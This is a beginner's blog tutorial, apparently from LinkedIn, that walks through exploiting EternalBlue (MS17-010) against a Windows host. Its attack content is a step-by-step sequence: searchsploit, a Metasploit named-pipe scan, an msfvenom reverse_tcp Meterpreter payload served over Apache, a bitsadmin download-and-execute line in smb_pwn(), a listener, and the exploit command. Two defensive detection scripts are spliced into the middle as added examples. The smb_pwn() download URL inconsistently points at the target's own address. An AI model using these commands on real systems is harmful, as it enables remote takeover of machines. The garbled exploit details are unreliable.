Falling Prey to EternalBlue | A Beginner's Guide to a Devastating Exploit


On May 12th, 2017, computers around the world went black. Hospitals in the UK were turning patients away because they couldn't gain access to their medical systems. Telecommunications companies were telling their employees to power down their computers. The NSA was panicking, trying to determine how such confidential information could have leaked out and helped spark this computational catastrophe.


This was the WannaCry ransomware attack, and it amounted to approximately $4 billion in losses. Using a cryptoworm that targeted the Windows OS, the attacker encrypted victims' personal files and demanded a payment in Bitcoin in exchange for restoring the files to their original state. It is astonishing that this ransomware, active for only four days, did this much damage!

But what I think is even more shocking is that the method behind the attack is still publicly available for anyone to use. I am referring to the exploit EternalBlue.

This exploit was originally developed by the NSA and was leaked by the hacker group the Shadow Brokers in April 2017. It abuses a flaw in the Windows SMB file-sharing service (the vulnerability Microsoft patched as MS17-010) to gain access to other devices on a network. EternalBlue can be run using Metasploit, Python, and other methods that we don't need to focus on.

Now, while I obviously don't encourage anyone to use this exploit to attack another person's device, in this article we're going to go over the process of running it with its Python implementation and Metasploit.

When I run Metasploit in this explanation, it will be on Kali Linux. As a quick overview, Metasploit is a platform that allows one to write and test exploits and to develop tools to stop them. There is a large list of exploits one can run using this platform. Here's a list of a few of them:

[Screenshot: a list of Metasploit exploit modules]

Once one determines which exploit module to use, they can view which operating systems the exploit affects.

[Screenshot: the operating systems the selected exploit module affects]

Now, when running EternalBlue, there are three steps to follow: setting up the exploit, forming a connection to the target device, and serving the payload and running the exploit.

1. Setting Up the Exploit

To start off, we first need to find the exploit. In the Kali Linux terminal, type searchsploit eternalblue. You will receive this as a result:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                  | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                              | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                        | exploits/windows_x86-64/remote/42030.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
 Paper Title                                                                                                                                                       |  Path
                                                                                                                                                                   | (/usr/share/exploitdb-papers/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                                                                                      | docs/english/41896-how-to-exploit-eternalblue-
How to Exploit ETERNALBLUE on Windows Server 2012 R2                                                                                                               | docs/english/42280-how-to-exploit-eternalblue-
[Spanish] How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                                                                            | docs/spanish/41897-[spanish]-how-to-exploit-et
[Spanish] How to Exploit ETERNALBLUE on Windows Server 2012 R2                                                                                                     | docs/spanish/42281-[spanish]-how-to-exploit-et
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------

The part we want to focus on is 42315.py; that file is the actual exploit, and from here on it is referred to as exploit.py. Run it with no arguments by typing python exploit.py. We will get this usage message as a result:

exploit.py <ip> [pipe_name]

We are now in a position to input our target device's information, and thus move on to step 2!

2. Forming a Connection to the Target Device

There are two tasks that we need to accomplish in this step: finding a named pipe and inputting the target's IP address.

Regarding the former, a pipe is a section of shared memory used for inter-process communication. A named pipe is one that has a name, so that other processes, including processes on other devices, can open it; Windows exposes named pipes over the network through SMB, which runs on ports such as 445/tcp, 137/tcp and 139/tcp. Now, why do we have to find a named pipe on the target device? The exploit needs the name of a pipe it can open on the target: opening that pipe establishes the SMB session between the attacker (us) and the target device, and it is over that session that files are transferred between the devices, as we will do later on.

To search for available named pipes, we can use a Metasploit scanner. In a terminal, input the following:

msfconsole
search pipe

This will output a list of modules. The one we want is pipe_auditor. Load it by typing:

use auxiliary/scanner/smb/pipe_auditor

We now have to input the target's IP address so the module knows which host to scan. Type options and this will be the output:

Module options (auxiliary/scanner/smb/pipe_auditor):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

The option we care about is RHOSTS, which is where we input the IP address. Let's say our target's IP address is 44.254.101.206. Input the following:

set rhosts 44.254.101.206

Now we can run the scanner by typing run! In our case, we will get this as a result:

[+] 44.254.101.206:445       - Pipes: \netlogon, \lsarpc, \samr
[*] 44.254.101.206:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see that the available pipes are netlogon, lsarpc, and samr. Now that we have the necessary information about the target device, we can begin to run the exploit!

3. Serving the Payload and Running the Exploit

In general, a payload is the part of a transmission that carries the actual data (i.e. not the header and other components); in exploitation, it is the code that the exploit delivers and executes on the target. We will generate shellcode for our payload. Shellcode is a sequence of machine instructions that an exploit injects and executes. We will use Apache to host the payload file so the target can download it, and MSFvenom, another Metasploit tool, to generate the shellcode.

Let's say our IP address is 72.183.189.157. To generate the payload, input the following in a new terminal:

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=72.183.189.157 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/temp.exe

This creates the shellcode, wraps it in a Windows executable, and saves it as temp.exe in /var/www/html, the default document root of the Apache server. Once the Apache server is running, the target will be able to download the payload from our device and execute it. Input the following to start it:

service apache2 start

Before we finally run the exploit, we have to get our payload file onto the target and launch it there; in other words, the payload runs through this file. The code that does this lives in the exploit's Python source itself, in the smb_pwn() function:

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download https://44.254.101.206:445/temp.exe C:\temp.exe')
    service_exec(conn, r'cmd /c /temp.exe')

def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
    with open(localSrc, 'rb') as fp:
        smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

This portion of the code runs once the exploit has an SMB connection to the target: smb_pwn() receives that connection and uses service_exec() to run commands on the target, first fetching temp.exe and then executing it, so the payload is run through this file. smb_send_file() is the helper that copies a local file onto the target over the SMB share.
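From the defender's side, the commands smb_pwn() runs leave a distinctive trace in process-creation logs on the target: a shell launched by a service, running bitsadmin to download an executable, followed by that executable being launched from the root of a drive. The following is an added example, not code from this article or from the 42315.py exploit, that flags that pattern over a handful of constructed log events. It assumes that service_exec() runs its commands through a temporary Windows service (so the shell's parent process is services.exe), as the function name suggests; the ProcEvent fields, the rule names and the sample events are all constructed for the demo.

```python
"""Added detection example (not from the article or the exploit): flag the
download-then-run pattern produced by the smb_pwn() function shown above.
The ProcEvent fields and SAMPLE_EVENTS are constructed for this demo and
loosely mimic process-creation telemetry (e.g. Sysmon Event ID 1)."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    host: str      # monitored machine name
    parent: str    # image path of the parent process
    cmdline: str   # full command line of the new process


# bitsadmin asked to fetch a URL and write it to a local path
BITS_DOWNLOAD = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\b.*?/download\b\s+"
    r"(?P<url>\S+)\s+(?P<dest>\S+)",
    re.IGNORECASE,
)
# an .exe sitting directly under a drive root (e.g. C:\temp.exe) rather than
# inside a normal program directory
ROOT_EXE = re.compile(r"(?:^|\s)(?:[a-z]:)?\\[^\\\s]+\.exe\b", re.IGNORECASE)

# Assumption: service_exec() runs its command through a temporary service,
# so the shell's parent is the service control manager.
SERVICE_PARENT = "\\services.exe"


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of the rules this event triggers (empty = not flagged)."""
    hits = []
    cmd = ev.cmdline.lower()
    from_service = ev.parent.lower().endswith(SERVICE_PARENT)
    m = BITS_DOWNLOAD.search(ev.cmdline)
    if m and m.group("dest").lower().endswith(".exe"):
        hits.append("bitsadmin_exe_download")
    if from_service and "cmd /c" in cmd:
        hits.append("service_spawned_cmd")
    if from_service and ROOT_EXE.search(ev.cmdline):
        hits.append("service_spawned_root_exe")
    return hits


def triage(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """Keep only flagged events, as (host, rules) pairs, in log order."""
    out = []
    for ev in events:
        rules = classify(ev)
        if rules:
            out.append((ev.host, rules))
    return out


# Constructed sample: the two commands from smb_pwn() as they would appear on
# the target, plus two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("W7-01", r"C:\Windows\System32\services.exe",
              r"cmd /c bitsadmin /transfer pwn /download "
              r"https://44.254.101.206:445/temp.exe C:\temp.exe"),
    ProcEvent("W7-01", r"C:\Windows\System32\services.exe",
              r"cmd /c C:\temp.exe"),
    ProcEvent("W7-02", r"C:\Windows\explorer.exe",
              r"bitsadmin /transfer upd /download "
              r"http://updates.example.invalid/patch.msu C:\Users\bob\patch.msu"),
    ProcEvent("W7-02", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS):
        print(host, ", ".join(rules))
```

The three rules are deliberately independent: a legitimate BITS download of an installer fires none of them, a service-spawned cmd.exe on its own fires one, and the walkthrough's pair of commands fires all three on the same host, which is the combination worth paging on.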

When running the exploit, we will use a reverse TCP Meterpreter payload, so that the target connects back to us and we are alerted when the exploit has run successfully. The following sets up our "listener", which waits for that connection to see if the exploit achieved its intended purpose:

msfconsole
use exploit/multi/handler

Then we select the same reverse TCP payload we built with MSFvenom:

set payload windows/x64/meterpreter/reverse_tcp

Set the listening host (our IP address) and the listening port (the port on which we wait for the target to connect back), then start the handler.

set lhost 72.183.189.157

set lport 4321

run

Once this is all complete, we can finally run the exploit. Input the following to do so:

python exploit.py 44.254.101.206 netlogon

We will know the exploit ran successfully if we receive a Meterpreter session: an interactive shell from which an attacker can explore the target machine and execute code.
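Steps 2 and 3 both leave network traces that a defender can correlate: the pipe scan and the exploit itself arrive on 445/tcp from an outside address, and a successful reverse_tcp payload makes the target open a connection back out to that same address on an unusual port (4321 above). The following detector is an added example, not part of the article, that runs over a few constructed connection-log lines and raises one alert for the external SMB access and a second when the same host calls back to the same outside address within ten minutes. The organisation prefix ORG_NETS, the log line format and the sample records are assumptions made for the demo.

```python
"""Added detection example (not part of the article): correlate inbound SMB
access from an outside address with a later outbound connection from the
same host back to that address, the network shape of steps 2 and 3 above.
ORG_NETS, the log line format and SAMPLE_FLOWS are constructed assumptions."""
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Assumption: the monitored network owns this prefix; anything else is "outside".
ORG_NETS = [ipaddress.ip_network("44.254.101.0/24")]
# how long after the SMB access a call-back still counts as related
WINDOW = timedelta(minutes=10)
# outbound destination ports common enough that we do not alert on them
EXPECTED_OUTBOUND = {53, 80, 443}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ORG_NETS)


def parse(line: str) -> Dict[str, object]:
    """Parse one constructed record: '<iso-time> TCP <src>:<port> -> <dst>:<port> <flags>'."""
    ts, proto, src, _arrow, dst, _flags = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "proto": proto,
            "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport)}


Alert = Tuple[str, str, str, datetime]  # (rule, internal host, outside ip, time)


def detect(lines: List[str]) -> List[Alert]:
    alerts: List[Alert] = []
    smb_seen: Dict[Tuple[str, str], datetime] = {}  # (host, outside ip) -> first SMB hit
    for rec in sorted((parse(ln) for ln in lines), key=lambda r: r["ts"]):
        src, dst = rec["src"], rec["dst"]
        # steps 2 and 3 on the wire: an outside address reaching the SMB port
        if rec["dport"] == 445 and is_internal(dst) and not is_internal(src):
            key = (dst, src)
            if key not in smb_seen:          # alert once per pair, remember when
                smb_seen[key] = rec["ts"]
                alerts.append(("external_smb_access", dst, src, rec["ts"]))
        # the reverse_tcp call-back: the host that was just reached connects out
        # to the same outside address on a port we would not expect
        elif is_internal(src) and not is_internal(dst) and rec["dport"] not in EXPECTED_OUTBOUND:
            key = (src, dst)
            if key in smb_seen and rec["ts"] - smb_seen[key] <= WINDOW:
                alerts.append(("reverse_connection_after_smb", src, dst, rec["ts"]))
    return alerts


# Constructed sample traffic around the walkthrough's addresses (target
# 44.254.101.206, attacker 72.183.189.157); 203.0.113.10 is a benign site.
SAMPLE_FLOWS = [
    "2017-05-12T09:30:00 TCP 44.254.101.50:49200 -> 44.254.101.206:445 SYN",   # internal file share
    "2017-05-12T10:01:03 TCP 72.183.189.157:51234 -> 44.254.101.206:445 SYN",  # pipe_auditor scan
    "2017-05-12T10:01:04 TCP 72.183.189.157:51235 -> 44.254.101.206:445 SYN",  # exploit's SMB session
    "2017-05-12T10:01:09 TCP 44.254.101.206:49160 -> 72.183.189.157:4321 SYN", # meterpreter call-back
    "2017-05-12T10:02:30 TCP 44.254.101.206:49161 -> 203.0.113.10:443 SYN",    # ordinary HTTPS
]

if __name__ == "__main__":
    for rule, host, outside, ts in detect(SAMPLE_FLOWS):
        print(ts.isoformat(), rule, host, "<->", outside)
```

The first rule on its own is the more fundamental finding: port 445 should not be reachable from outside the organisation at all, and blocking it at the perimeter (together with applying the MS17-010 patch) removes both the scan and the exploit before any correlation is needed. The second rule exists for the case where that boundary has already failed.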

And we're done! We've successfully infiltrated a device on the network. This can all seem very complicated and scary at first, but once you look past all the illegal harm this exploit can cause, it can actually be quite interesting and fun to learn about! However, this relatively uncomplicated program can cause catastrophic harm in the wrong hands. But through new developments in machine learning, quantum cryptography, blockchain, and other exponential technologies, dangerous exploits like EternalBlue will be erased... eternally!

Main Takeaways

  1. EternalBlue allows one to gain access to other devices on a network.
  2. It can be implemented using Python and Metasploit.
  3. Running EternalBlue requires three main steps: setting up the exploit, forming a connection to the target device, and serving the payload and running the exploit.


Hey! Thanks for reading! If you want to learn about more projects that I'm working on, follow me on LinkedIn.

Rod Danz
Owner (CFO), Interfuse Corporation Inc.
4 years

I really enjoyed how you STEP BY STEP taught me how you created this computer hack! Not that, as you said, I want to repeat this activity, but I learned how very easy it is to create major problems for a computer system. Out of interest, do you know how to program the new quantum computer? I know the language is different from analog computers. To me, it seems this language will be very important in the future of computing and computer science.
